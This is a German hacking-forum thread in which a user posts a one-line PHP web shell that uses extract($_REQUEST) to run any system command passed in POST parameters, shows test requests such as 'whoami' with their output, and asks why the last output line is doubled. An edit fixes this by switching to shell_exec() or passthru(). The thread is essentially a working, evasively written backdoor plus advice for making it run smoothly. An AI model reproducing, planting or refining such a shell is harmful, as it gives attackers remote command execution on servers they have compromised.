Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[PHP] Fehlerhafte Ausgabe von PHP-Shell

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Könnt ihr mir erklären warum diese Shell die letzte Zeile der Ausgabe immer dupliziert?

 

Shell-Code:

<?php error_reporting(0); extract($_REQUEST); die($ctime($atime)); ?>

1. Test-Command:

http://localhost/test.php | POST: ctime=system&atime=whoami

Ausgabe:

pc01\x
pc01\x

2. Test-Command:

http://localhost/test.php | POST: ctime=system&atime=echo Test!

Ausgabe:

Test!
Test!

Zum verdeutlichen des Problems hier nochmal ein Screenshot von Curl:

a3W3elH.png

 

Wie man sieht wird die letzte Zeile immer doppelt ausgegeben.

Lässt sich das irgendwie vermeiden bzw. beheben?

Nervt nämlich sehr wenn man vernünftig damit arbeiten möchte.

 

 

 

--------------- EDIT ---------------

 

 

 

Habe den Fehler bereits selbst gefunden:

lqfV6Hr.png

 

Statt system() oder exec() sollte in diesem Fall eher shell_exec() oder passthru() verwendet werden:

system()                  = Komplette Ausgabe, letzte Zeile doppelt.

exec()                    = Einfache Ausgabe, nur letzte Zeile.

shell_exec() & passthru() = Komplette Ausgabe mit folgender Leerzeile.

Bearbeitet von SecurityFlaw, 28 April 2018 - 00:04 Uhr.

  • Ch!ller und 3eyes gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 26 user(s)


    3eyes, B1nary, Bot4ng, Ch!ller, cubik, Cyber Tjak, DarkSky, DeepWater, docsnider, fl4shx, Framerater, hanshenkelman, JohnR, kiwitone, leonalexkraus, Mini Rick, Mofug, PadX18, pepeSito, pi^2, ProHex, R3V3R53, SecurityFlaw, Statine, xVirtu, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.